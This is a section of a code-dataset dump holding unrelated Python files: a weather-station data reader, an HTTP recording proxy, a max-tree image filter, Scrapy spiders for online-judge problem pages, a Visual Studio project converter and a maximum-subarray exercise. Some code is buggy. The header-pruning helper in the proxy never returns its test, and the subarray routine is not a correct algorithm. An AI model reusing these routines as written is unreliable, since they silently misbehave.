main()","sub_path":"searchNetworkFunctions.py","file_name":"searchNetworkFunctions.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85730830","text":"from matplotlib.dates import date2num\n\nimport datetime as dt\nimport logging\nimport numpy as np\nimport os\nimport scipy.io as sio\n\nimport networkNames as names\n\nimport mospat_inc_directories as IncDir\nimport mospat_utils_equation\nimport IncludeFile as IncF\nfrom INetwork import INetwork\nfrom aux_operations import naive_num2date\n\n\n\nclass LaObra(INetwork):\n\n def setName(self):\n return names.laobra\n\n def read(self, c_Variable, c_Network):\n t_VarsUnits = {'TEMP': 'degreeC', 'WSPEED': 'm s-1', 'RH': 'percent', 'VD': 'degrees',\n 'WSPEEDU': 'm s-1', 'WSPEEDV': 'm s-1', 'BCAR': 'ug m-3', 'PM25': 'ug m-3',\n 'PM10': 'ug m-3', 'SO2': 'ppb', 'O3': 'ppb', 'CO': 'ppm',\n 'NOX': 'ppb', 'CH4': 'ppmC', 'HCNM': 'ppm', 'NO': 'ppb',\n 'NO2': 'ppb', 'NH3': 'g m-3'}\n\n t_ObsStationData = dict()\n c_ObsNetDirs = IncDir.c_ObsNetDir\n c_ObsNetName = IncDir.c_ObsNetName\n idx_Net = c_ObsNetName.index(c_Network)\n c_Files = os.listdir(c_ObsNetDirs[idx_Net])\n logging.info('Data Directory: %s' % c_ObsNetDirs[idx_Net])\n c_FileName = c_Files[1]\n logging.info('Reading file: %s' % c_FileName)\n c_ObsFiles = c_ObsNetDirs[idx_Net] + 
c_FileName\n f_alldatafile_aux = sio.loadmat(c_ObsFiles, squeeze_me=True, struct_as_record=False)\n f_alldatafile = sio.loadmat(c_ObsFiles)\n f_alltime_aux = f_alldatafile['datalaobra2']['time'][0][0][::12] - 366\n d_alltime_aux = [naive_num2date(f_T[0]) + dt.timedelta(hours=IncF.i_TimeZone) for f_T in f_alltime_aux]\n f_alltime_aux = [date2num(d_T) for d_T in d_alltime_aux]\n f_date_i = date2num(dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y'))\n f_date_f = date2num(dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y'))\n f_Stntime = []\n d_Stntime = []\n f_date_aux = f_date_i\n d_date_aux = naive_num2date(f_date_i)\n while f_date_aux <= f_date_f + 23 / 24.:\n f_Stntime.append(date2num(d_date_aux))\n d_Stntime.append(d_date_aux)\n d_date_aux = d_date_aux + dt.timedelta(hours=1)\n f_date_aux = date2num(d_date_aux)\n d_alltime = d_Stntime\n f_alltime = f_Stntime\n i_start = np.where(np.array(f_alltime_aux) >= f_date_i)[0][0]\n i_end = np.where(np.array(f_alltime_aux) <= f_date_f)[0][-1]\n\n if c_Variable == 'WSPEED':\n c_Var = 'vels'\n elif c_Variable == 'VD':\n c_Var = 'dirv'\n elif c_Variable == 'TEMP':\n c_Var = 'temp'\n elif c_Variable == 'P':\n c_Var = 'pres'\n elif c_Variable == 'RH':\n c_Var = 'hrel'\n else:\n c_Var = c_Variable\n\n if c_Var in f_alldatafile_aux[\n 'datalaobra2']._fieldnames or c_Var == 'WSPEEDU' or c_Var == 'WSPEEDV' or c_Var == 'Q' or c_Var == 'POT':\n if c_Var == 'WSPEEDU' or c_Var == 'WSPEEDV':\n f_AllVarDataVV = f_alldatafile['datalaobra2']['vels'][0][0][::12]\n f_AllVarDataVD = f_alldatafile['datalaobra2']['dirv'][0][0][::12]\n if c_Var == 'WSPEEDU':\n f_AllVarData = -np.sin(f_AllVarDataVD * np.pi / 180.) * f_AllVarDataVV\n if c_Var == 'WSPEEDV':\n f_AllVarData = -np.cos(f_AllVarDataVD * np.pi / 180.) * f_AllVarDataVV\n elif c_Var == 'Q':\n f_AllVarDataT = f_alldatafile['datalaobra2']['temp'][0][0][::12]\n f_AllVarDataP = f_alldatafile['datalaobra2']['pres'][0][0][::12]\n f_AllVarDataRH = f_alldatafile['datalaobra2']['hrel'][0][0][::12]\n f_AllVarDataRsat = mospat_utils_equation.mospat_utils_rsat(f_AllVarDataP, f_AllVarDataT)\n f_AllVarData = f_AllVarDataRH * f_AllVarDataRsat / 100.\n elif c_Var == 'POT':\n f_AllVarDataT = f_alldatafile['datalaobra2']['temp'][0][0][::12]\n f_AllVarDataP = f_alldatafile['datalaobra2']['pres'][0][0][::12]\n f_AllVarData = mospat_utils_equation.mospat_utils_tpot(f_AllVarDataT, f_AllVarDataP)\n else:\n f_AllVarData = f_alldatafile['datalaobra2'][c_Var][0][0][::12]\n f_VarData = f_AllVarData[i_start:i_end + 24][np.in1d(f_alltime_aux[i_start:i_end + 24], f_alltime)]\n t_ObsStationData['f_Time'] = np.array([f_alltime])\n t_ObsStationData['d_Time'] = np.array([d_alltime])\n t_ObsStationData['f_Lat'] = np.array([-33.6])\n t_ObsStationData['f_Lon'] = np.array([-70.483])\n t_ObsStationData['f_Elevation'] = np.array([720])\n t_ObsStationData['c_StationName'] = np.array(['LaObra'])\n t_ObsStationData[c_Variable] = np.array([f_VarData[:, 0]])\n t_ObsStationData['t_Units'] = dict()\n if c_Variable in t_VarsUnits:\n t_ObsStationData['t_Units'][c_Variable] = t_VarsUnits[c_Variable]\n return t_ObsStationData, 'Hourly'\n else:\n return t_ObsStationData, None\n","sub_path":"read/networks/LaObra.py","file_name":"LaObra.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335025741","text":"# Servirtium: Service Virtualized HTTP\n#\n# Copyright (c) 2019, Paul Hammant and committers\n# All rights reserved.\n#\n# Redistribution and use in source and 
binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation are those\n# of the authors and should not be interpreted as representing official policies,\n# either expressed or implied, of the Servirtium project.\nimport itertools\nimport sys\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nimport requests\nfrom definitions import MOCKS_DIR\nfrom interaction_recording import InteractionRecording\nfrom servirtium.interactions import Interaction\n\n\ndef _prune_headers(headers, removables):\n def _to_be_removed(item):\n (key, value) = item\n line = f'{key}: {value}'\n any([line.startswith(removable) for removable in removables])\n\n return dict(itertools.filterfalse(_to_be_removed, headers.items()))\n\n\nclass Interception:\n def __init__(self,\n host: str = \"default_host\",\n request_header_overrides: dict = None,\n response_headers_to_remove: list = None) -> None:\n self.host = host\n self.request_header_overrides = request_header_overrides or {}\n self.response_headers_to_remove = response_headers_to_remove or []\n self.current_recording = InteractionRecording()\n\n def modified_request_headers(self, new_req_headers):\n modified = new_req_headers.copy()\n modified.update(self.request_header_overrides)\n return modified\n\n def modified_response_headers(self, response):\n return _prune_headers(response.headers, self.response_headers_to_remove)\n\n def real_service_host(self):\n return self.host.replace('http://', '')\n\n\n# noinspection PyPep8Naming\nclass RecorderHttpHandler(BaseHTTPRequestHandler):\n interception = Interception()\n invoking_method = 'default_method'\n\n @staticmethod\n def set_invoking_method(method_name):\n RecorderHttpHandler.invoking_method = method_name\n RecorderHttpHandler.current_recording = InteractionRecording()\n\n def do_GET(self):\n self.process_request(\"\\n\")\n\n def do_POST(self):\n self.process_request_with_body()\n\n def process_request_with_body(self):\n self.process_request(self.rfile.read(int(self.headers['Content-Length'])))\n\n def do_PUT(self):\n self.process_request_with_body()\n\n def process_request(self, request_body):\n new_req_headers = dict(self.headers.items())\n new_req_headers.update({'Host': self.interception.real_service_host()})\n\n response = 
self.perform_request_on_real_service(new_req_headers, request_body)\n self.send_response(response.status_code)\n self.end_headers()\n self.wfile.write(response.content)\n RecorderHttpHandler.interception.current_recording.add_interaction(\n Interaction(http_verb=self.command,\n request_headers=self.interception.modified_request_headers(new_req_headers),\n request_body=request_body,\n request_path=self.path,\n response_headers=self.interception.modified_response_headers(response),\n response_body=(str(response.content, encoding='utf-8')),\n response_code=response.status_code))\n f = open(MOCKS_DIR + RecorderHttpHandler.invoking_method.replace(\"test_\", '') + \".md\", \"w+\")\n f.write(RecorderHttpHandler.interception.current_recording.to_markdown_string())\n f.close()\n\n def perform_request_on_real_service(self, new_req_headers, request_body):\n if self.command == \"GET\":\n response = requests.request(self.command, RecorderHttpHandler.interception.host + self.path,\n headers=new_req_headers)\n else:\n response = requests.request(self.command, RecorderHttpHandler.interception.host + self.path,\n headers=new_req_headers, data=request_body)\n return response\n\n\ndef set_real_service(host):\n RecorderHttpHandler.interception.host = host\n\n\ndef set_request_header_replacements(replacements):\n RecorderHttpHandler.interception.request_header_overrides = replacements\n\n\ndef set_response_header_removals(removals):\n RecorderHttpHandler.interception.response_headers_to_remove = removals\n\n\ndef start():\n server_address = ('localhost', 61417)\n try:\n httpd = HTTPServer(server_address, RecorderHttpHandler)\n except OSError as e:\n if \"Address already in use\" in str(sys.exc_info()[1]):\n assert False, \"Address 'localhost:61417' is in use already - can't start recorder\"\n raise e\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n start()\n","sub_path":"servirtium/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26126755","text":"import numpy as np\nfrom copy import copy\nfrom typing import List, Dict\nfrom python_research.preprocessing.attribute_profiles.utils.data_types import Pixel\nfrom python_research.preprocessing.attribute_profiles\\\n .max_tree.attribute_matrix_construction import construct_matrix\nfrom operator import attrgetter\n\n\nIMAGE_DIMS = 2\nIMPLEMENTED_ATTRIBUTES = ['area', 'stddev', 'diagonal', 'moment']\nNOT_PROCESSED = -1\n\n\nclass MaxTree:\n def __init__(\n self, image: np.ndarray,\n attributes_to_compute: List[str] = None\n ):\n if attributes_to_compute is None:\n attributes_to_compute = ['area']\n for attribute in attributes_to_compute:\n if attribute not in IMPLEMENTED_ATTRIBUTES:\n raise ValueError(\n \"Attribute {} is not implemented\".format(attribute)\n )\n if image.ndim != IMAGE_DIMS:\n raise ValueError(\n \"Image should have {} dimensions, not {}\".format(IMAGE_DIMS, image.ndim)\n )\n self.image = image\n self.parent = np.full(image.shape, NOT_PROCESSED, dtype=Pixel)\n self.zpar = np.zeros(image.shape, dtype=Pixel)\n self.s = []\n self.node_index = np.full(image.shape, -1)\n self.attribute_names = attributes_to_compute\n self._build_tree()\n self._compute_nani()\n\n def _get_neighbours(self, pixel: Pixel):\n neighbours = []\n adjacency = [(i, j) for i in (-1, 0, 1) for j in (-1, 0, 1) if not (i == j == 0)]\n for dx, dy in adjacency:\n if 0 <= pixel.x + dx < self.image.shape[1] and 0 <= pixel.y + dy < 
self.image.shape[0]:\n x = pixel.x + dx\n y = pixel.y + dy\n neighbours.append(Pixel(x, y, self.image[y, x]))\n return neighbours\n\n def _sort_pixels(self):\n image_width = self.image.shape[1]\n for index, pixel_value in enumerate(self.image.flatten()):\n x = index % image_width\n y = int(index / image_width)\n self.s.append(Pixel(x, y, pixel_value))\n\n self.s = sorted(self.s, key=attrgetter('value'))\n\n def _find_root(self, pixel: Pixel):\n parent_pixel = self.zpar[pixel.coords]\n if parent_pixel.coords != pixel.coords:\n self.zpar[pixel.coords] = self._find_root(parent_pixel)\n return self.zpar[pixel.coords]\n\n def _canonize(self):\n for pixel in self.s:\n q = self.parent[pixel.coords]\n q_parent = self.parent[q.coords]\n if self.image[q.coords] == self.image[q_parent.coords]:\n self.parent[pixel.coords] = q_parent\n\n def _build_tree(self):\n self._sort_pixels()\n for pixel in reversed(self.s):\n self.parent[pixel.coords] = pixel\n self.zpar[pixel.coords] = pixel\n for neighbour in self._get_neighbours(pixel):\n if self.parent[neighbour.coords] != NOT_PROCESSED:\n root = self._find_root(neighbour)\n if root != pixel:\n self.zpar[root.coords] = pixel\n self.parent[root.coords] = pixel\n self._canonize()\n\n def _construct_attribute_matrices(self):\n attribute_matrices = dict()\n for attribute in self.attribute_names:\n attribute_matrices[attribute] = construct_matrix(attribute, self.image)\n return attribute_matrices\n\n def _compute_attributes(self):\n sorted_lvroots = []\n nlvroots = 0\n attribute_matrices = self._construct_attribute_matrices()\n for pixel in reversed(self.s):\n for attribute_matrix in attribute_matrices.values():\n attribute_matrix[self.parent[pixel.coords].coords] += attribute_matrix[pixel.coords]\n if (\n self.image[self.parent[pixel.coords].coords] != self.image[pixel.coords] or\n self.parent[pixel.coords] == pixel\n ):\n sorted_lvroots.append(pixel)\n nlvroots += 1\n return sorted_lvroots, nlvroots, attribute_matrices\n\n def _fill_nani(\n self,\n sorted_lvroots: List,\n attribute_matrices: Dict[str, np.ndarray]\n ):\n for index, pixel in enumerate(reversed(sorted_lvroots)):\n self.node_index[pixel.coords] = index\n self.parent_gray_level_relation[index, 0] = self.node_index[\n self.parent[pixel.coords].coords\n ]\n self.parent_gray_level_relation[index, 1] = self.image[pixel.coords]\n for attribute_name in self.attribute_values.keys():\n self.attribute_values[attribute_name][index] = attribute_matrices[\n attribute_name\n ][pixel.coords].get()\n\n def _fill_remaining_positions(self):\n node_index_width = self.node_index.shape[1]\n for index, value in enumerate(self.node_index.flatten()):\n x = index % node_index_width\n y = int(index / node_index_width)\n if self.node_index[y, x] == -1:\n self.node_index[y, x] = self.node_index[\n self.parent[y, x].coords\n ]\n\n def _compute_nani(self):\n sorted_lvroots, nlvroots, attribute_matrices = self._compute_attributes()\n self.parent_gray_level_relation = np.zeros((nlvroots, 2))\n self.attribute_values = {\n attribute_name: np.zeros((nlvroots,)) for attribute_name in self.attribute_names\n }\n self._fill_nani(sorted_lvroots, attribute_matrices)\n self._fill_remaining_positions()\n\n def _define_removed_nodes(self, attribute: str, threshold):\n to_keep = self.attribute_values[attribute] < threshold\n return ~to_keep\n\n def _direct_filter(self, attribute, threshold):\n to_keep = self._define_removed_nodes(attribute, threshold)\n to_keep[0] = True\n parent = copy(self.parent_gray_level_relation[:, 0])\n lut = 
self._update_parents(parent, to_keep)\n lut = self._update_lut(lut, to_keep)\n node_index = self._update_node_index(lut)\n return node_index\n\n def _update_parents(self, parent, to_keep):\n M = self.parent_gray_level_relation.shape[0]\n nearest_ancestor_kept = [0 for _ in range(0, M)]\n lut = [x for x in range(0, M)]\n for i in range(0, M):\n if not to_keep[i]:\n temp = nearest_ancestor_kept[int(parent[i])]\n nearest_ancestor_kept[i] = temp\n lut[i] = lut[temp]\n else:\n nearest_ancestor_kept[i] = i\n parent[i] = nearest_ancestor_kept[int(parent[i])]\n return lut\n\n def _update_lut(self, lut: List, to_keep: List[bool]):\n M = self.parent_gray_level_relation.shape[0]\n index_fix = [None for _ in range(0, M)]\n index_fix[0] = ~to_keep[0]\n for i in range(1, M - 1):\n index_fix[i] = index_fix[i - 1] + ~to_keep[i]\n lut[i] = lut[i] + index_fix[i]\n return lut\n\n def _update_node_index(self, lut: List):\n image_width = self.node_index.shape[1]\n node_index = copy(self.node_index)\n for index, pixel in enumerate(node_index.flatten()):\n x = index % image_width\n y = int(index / image_width)\n node_index[y, x] = lut[node_index[y, x]]\n return node_index\n\n def _reconstitute_image(self, node_index):\n image = copy(self.image)\n image_width = image.shape[1]\n for index, pixel in enumerate(image.flatten()):\n x = index % image_width\n y = int(index / image_width)\n image[y, x] = self.parent_gray_level_relation[[node_index[y, x]], 1]\n return image\n\n def filter(self, attribute: str, threshold):\n node_index = self._direct_filter(attribute, threshold)\n return self._reconstitute_image(node_index)\n","sub_path":"python_research/preprocessing/attribute_profiles/max_tree/max_tree.py","file_name":"max_tree.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169206535","text":"import scrapy,re\r\nfrom scrapy.spiders import Spider\r\nfrom scrapy.selector import Selector\r\nfrom datetime import datetime\r\nfrom crawl.items import ProblemItem\r\nfrom lxml import etree\r\n\r\n\r\nclass HduProblemSpider(Spider):\r\n name = 'hdu_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1005', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(HduProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.hdu.edu.cn/showproblem.php?pid=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n #print(\"11111111111111111\",type(response.body))\r\n \r\n html = (response.body).decode('gbk','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'HDU'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.xpath('//h1/text()').extract()[0]\r\n item['desc'] = sel.css('.panel_content').extract()[0]\r\n item['input'] = sel.css('.panel_content').extract()[1]\r\n item['output'] = sel.css('.panel_content').extract()[2]\r\n item['timeLimit'] = \\\r\n sel.xpath('//b/span/text()').re('T[\\S*\\s]*S')[0][12:]\r\n item['memoryLimit'] = \\\r\n sel.xpath('//b/span/text()').re('Me[\\S*\\s]*K')[0][14:]\r\n item['sampleInput'] = sel.xpath('//pre/div/text()').extract()[0]\r\n item['sampleOutput'] = sel.xpath('//pre/div/text()').extract()[1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n Ls = sel.xpath('//pre/div/div').extract()\r\n item['note'] = ''\r\n if len(Ls) > 0:\r\n item['note'] = Ls[0]\r\n \r\n return 
item\r\n\r\n\r\nclass PojProblemSpider(Spider):\r\n name = 'poj_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1000', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(PojProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://poj.org/problem?id=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n html = (response.body).decode('gbk','ignore') \r\n sel = Selector(text=html)\r\n\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'POJ'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.css('.ptt').xpath('./text()').extract()[0]\r\n item['desc'] = sel.css('.ptx').extract()[0]\r\n item['input'] = sel.css('.ptx').extract()[1]\r\n item['output'] = sel.css('.ptx').extract()[2]\r\n try:\r\n item['timeLimit'] = sel.css('.plm').\\\r\n re('Case\\sT[\\S*\\s]*MS')[0][21:]\r\n except:\r\n item['timeLimit'] = sel.css('.plm').re('T[\\S*\\s]*MS')[0][16:]\r\n item['memoryLimit'] = sel.css('.plm').re('Me[\\S*\\s]*K')[0]\r\n item['sampleInput'] = sel.css('.sio').extract()[0]\r\n item['sampleOutput'] = sel.css('.sio').extract()[1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n \r\n item['note'] = ''\r\n \r\n return item\r\n\r\nclass ZojProblemSpider(Spider):\r\n name = 'zoj_problem'\r\n problem_id = '1001'\r\n\r\n def __init__(self, problem_id='1001', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(ZojProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.zju.edu.cn/onlinejudge/showProblem.do?problemCode=%s' % problem_id\r\n ]\r\n\r\n def getDetail(self,html):\r\n L = len(html)\r\n left = right = cnt = 0\r\n for i in range(0,L-4):\r\n if html[i:i+4] == '
<hr>':\r\n                cnt = cnt + 1\r\n                print(\"find a <hr>
\")\r\n if cnt == 2 :\r\n left = i+4\r\n elif cnt == 3:\r\n right = i+1\r\n break\r\n return html[left:right]\r\n\r\n def moreProcess(self,text):\r\n for i in range(0,len(text)):\r\n if text[i] == '>':\r\n return text[i+2:]\r\n\r\n def parse(self,response):\r\n html = (response.body).decode('gbk','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'ZOJ'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n \r\n item['title'] = sel.css('.bigProblemTitle').xpath('./text()').extract()[0]\r\n item['desc'] = self.getDetail(html)\r\n item['input'] = item['output'] = item['sampleInput'] = item['sampleOutput'] = item['note'] = ''\r\n item['timeLimit'] = self.moreProcess(str(sel.xpath('//center[2]').re('T[\\S*\\s]*s')[0]))\r\n item['memoryLimit'] = self.moreProcess(str(sel.xpath('//center[2]').re('M[\\S*\\s]*B')[0]))\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n yield item\r\n\r\n\r\n\r\nclass FzuProblemSpider(Spider):\r\n name = 'fzu_problem'\r\n #allowed_domains = ['acm.hdu.edu.cn']\r\n problem_id = '1000'\r\n\r\n def __init__(self, problem_id='1000', *args, **kwargs):\r\n self.problem_id = problem_id\r\n super(FzuProblemSpider, self).__init__(*args, **kwargs)\r\n self.start_urls = [\r\n 'http://acm.fzu.edu.cn/problem.php?pid=%s' % problem_id\r\n ]\r\n\r\n def parse(self, response):\r\n html = (response.body).decode('utf-8','ignore')\r\n sel = Selector(text=html)\r\n\r\n item = ProblemItem()\r\n item['originOj'] = 'FZU'\r\n item['problemId'] = self.problem_id\r\n item['problemUrl'] = response.url\r\n item['title'] = sel.xpath(\r\n '//div[contains(@class,\\\r\n \"problem_title\")]/b/text()').extract()[0][14:].rstrip()\r\n item['desc'] = \\\r\n sel.css('.pro_desc').extract()[0].\\\r\n replace('
', '').\\\r\n            replace('
', '')\r\n try:\r\n item['input'] = sel.css('.pro_desc').extract()[1]\r\n except:\r\n item['input'] = ''\r\n try:\r\n item['output'] = sel.css('.pro_desc').extract()[2]\r\n except:\r\n item['output'] = ''\r\n item['timeLimit'] = \\\r\n sel.css('.problem_desc').re('T[\\S*\\s]*c')[0][12:]\r\n item['memoryLimit'] = \\\r\n sel.css('.problem_desc').\\\r\n re('M[\\S*\\s]*B')[0][15:]\r\n item['sampleInput'] = \\\r\n sel.xpath('//div[@class=\"data\"]/text()').extract()[-2]\r\n item['sampleOutput'] = \\\r\n sel.xpath('//div[@class=\"data\"]/text()').extract()[-1]\r\n item['updateTime'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n \r\n item['note'] = ''\r\n \r\n return item\r\n","sub_path":"crawl/crawl/spiders/problem_spider.py","file_name":"problem_spider.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320445848","text":"import os\nimport glob\ndef v142_141(path):\n\tos.chdir(path)\n\tfiles=glob.glob('*.vcxproj')\n\tfor file in files:\n\t\tfid = open(file,'r')\n\t\tfid2 = open(file+'0','w')\n\t\tlastpt = 0\n\t\tfid.seek(0,0)\n\t\twhile 1:\n\t\t\tline = fid.readline()\n\t\t\tpt = fid.tell()\n\t\t\tif (len(line)==0):\n\t\t\t\tbreak\n\t\t\tloc = line.find('')\n\t\t\tif loc >= 0:\n\t\t\t\tloc1 = line.find('')\n\t\t\t\tif loc1 < 0:\n\t\t\t\t\tprint(' not matched in ' + file + ' !')\n\t\t\t\t\tfid.close()\n\t\t\t\t\treturn\n\t\t\t\tfid2.write(line[0:loc+len('')])\n\t\t\t\ttargetStr = line[loc+len(''):loc1]\n\t\t\t\tif targetStr == 'v142':\n\t\t\t\t\tfid2.write('v141')\n\t\t\t\telse:\n\t\t\t\t\tfid2.write(targetStr)\n\t\t\t\tafter_targetStr = line[loc+len('')+4:len(line)]\n\t\t\t\tfid2.write(after_targetStr)\n\t\t\telse:\n\t\t\t\tfid2.write(line)\n\t\tfid.close()\n\t\tfid2.close()\n\t\tos.remove(file)\n\t\tos.rename(file+'0',file)\n\nv142_141(\"c:\\\\temp\\\\temp\")\n\n\n","sub_path":"vs2019_2017.py","file_name":"vs2019_2017.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"689458","text":"\r\nN = [-20,13,-9,45,9,12,-200,15,40,32,44,43,41]\r\n\r\ndef find_maximum_sum(n):\r\n\r\n max_sum = max(n)\r\n i = j = n.index(max_sum)\r\n\r\n #print(i)\r\n sum = max_sum\r\n\r\n right_index = i+1\r\n if i == len(n)-1:\r\n right_index = len(n)\r\n left_index = 1\r\n\r\n for ind in range(i,0,-1):\r\n sum = sum + n[ind-1]\r\n if (sum >= max_sum):\r\n max_sum = sum\r\n left_index = ind\r\n if left_index == 1:\r\n left_index = i+1\r\n \r\n sum = max_sum\r\n for ind in range(j+1,len(n)):\r\n sum = sum + n[ind]\r\n if (sum > max_sum):\r\n max_sum = sum\r\n right_index = ind+1\r\n\r\n \r\n return(max_sum,left_index,right_index)\r\n\r\ndef find_mid_sum(left_sum,c,left_j,right_j):\r\n sum = left_sum\r\n max_mid_sum = left_sum\r\n mid_max_j = left_j\r\n for y in range(left_j,right_j):\r\n #print(\"c[y] is\", c[y])\r\n sum = sum + c[y]\r\n if sum > max_mid_sum:\r\n max_mid_sum = sum\r\n mid_max_j = y+1\r\n return(max_mid_sum,mid_max_j)\r\n\r\n\r\ndef main():\r\n N=[-20,13,-9,45,9,12,-200,15,40,32,44,43,41]\r\n val = 0\r\n for i in range(0,len(N)):\r\n if N[i] > 0:\r\n val = 1\r\n\r\n\r\n if val == 0:\r\n print(\"All numbers are negative\")\r\n max_sum = max(N)\r\n print(\"Maximal Sub array\",max_sum,\"Index i\",N.index(max_sum)+1,\"Index j\",N.index(max_sum)+1)\r\n exit()\r\n\r\n val = 0\r\n for i in range(0,len(N)):\r\n if N[i] < 0:\r\n val = 1\r\n\r\n\r\n sum = 0\r\n if val == 0:\r\n print(\"All numbers are 
positive\")\r\n for i in range(0,len(N)):\r\n sum = sum + N[i]\r\n print(\"Maximal Sub array\",sum,\"Index i\",1,\"Index j\",len(N))\r\n exit()\r\n \r\n\r\n length = len(N)\r\n mid_val = round(len(N)/2)\r\n\r\n list1 = N[0:mid_val]\r\n list2 = N[mid_val:length]\r\n\r\n left_max_val,left_i,left_j = find_maximum_sum(list1)\r\n\r\n right_max_val,right_i,right_j = find_maximum_sum(list2)\r\n right_i = right_i + mid_val\r\n right_j = right_j + mid_val\r\n\r\n mid_max_sum,mid_j = find_mid_sum(left_max_val,N,left_j,right_j) \r\n mid_i = left_i\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==left_max_val:\r\n print (\"Maximal Sub array\",left_max_val,\"Index i\",left_i,\"Index j\",left_j)\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==right_max_val:\r\n print (\"Maximal Sub array\",right_max_val,\"Index i\",right_i,\"Index j\",right_j)\r\n\r\n if max(left_max_val,right_max_val,mid_max_sum)==mid_max_sum:\r\n print (\"Maximal Sub array\",mid_max_sum,\"Index i\",mid_i,\"Index j\",mid_j)\r\n\r\nmain()","sub_path":"Divide_Conquer._Max_Sum_With_Indicespy.py","file_name":"Divide_Conquer._Max_Sum_With_Indicespy.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"494741309","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2011 OpenERP Venezuela (http://openerp.com.ve)\n# All Rights Reserved.\n# Programmed by: Israel Fermín Montilla \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsability of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# garantees and support are strongly adviced to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
